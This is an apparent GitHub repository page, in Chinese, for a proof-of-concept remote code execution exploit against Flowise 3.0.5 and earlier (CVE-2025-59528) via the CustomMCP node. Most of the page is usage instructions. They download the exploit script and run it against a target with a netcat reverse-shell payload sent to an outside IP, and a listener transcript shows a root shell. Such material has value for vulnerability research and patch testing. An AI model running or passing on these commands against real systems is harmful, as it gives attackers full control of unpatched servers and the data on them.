corey-farley/CVE-2025-59528-Flowise-RCE

GitHub: corey-farley/CVE-2025-59528-Flowise-RCE

一个针对Flowise <=3.0.5版本通过CustomMCP节点实现的远程代码执行漏洞的概念验证PoC工具。

Stars: 0 | Forks: 0

# CVE-2025-59528-Flowise-RCE 远程代码执行漏洞针对 Flowise 版本 <= 3.0.5 通过 CustomMCP 节点实现的经过身份验证的 RCE PoC（CVE-2025-59528）官方 GHSA 链接：用于反向 shell 的示例用法： ``` curl -sSLO 'https://raw.githubusercontent.com/corey-farley/CVE-2025-59528-Flowise-RCE/main/CVE-2025-59528.py' chmod +x CVE-2025-59528.py ./CVE-2025-59528.py -t 'http://target.com' -k 'API_KEY' -cmd 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.15.200 443 >/tmp/f' ``` 检查监听器，它应该能正常工作： ``` └─$ nc -lvnp 443 listening on [any] 443 ... connect to [10.10.15.200] from (UNKNOWN) [10.129.64.221] 43393 sh: can't access tty; job control turned off / # whoami root ```

标签：API利用, CustomMCP节点, CVE-2025-59528, Flowise平台, Python PoC, 反向Shell, 命令执行, 威胁模拟, 安全漏洞, 情报收集, 概念验证, 漏洞研究, 编程工具, 网络安全, 自动化攻击, 认证漏洞, 远程代码执行, 逆向工具, 隐私保护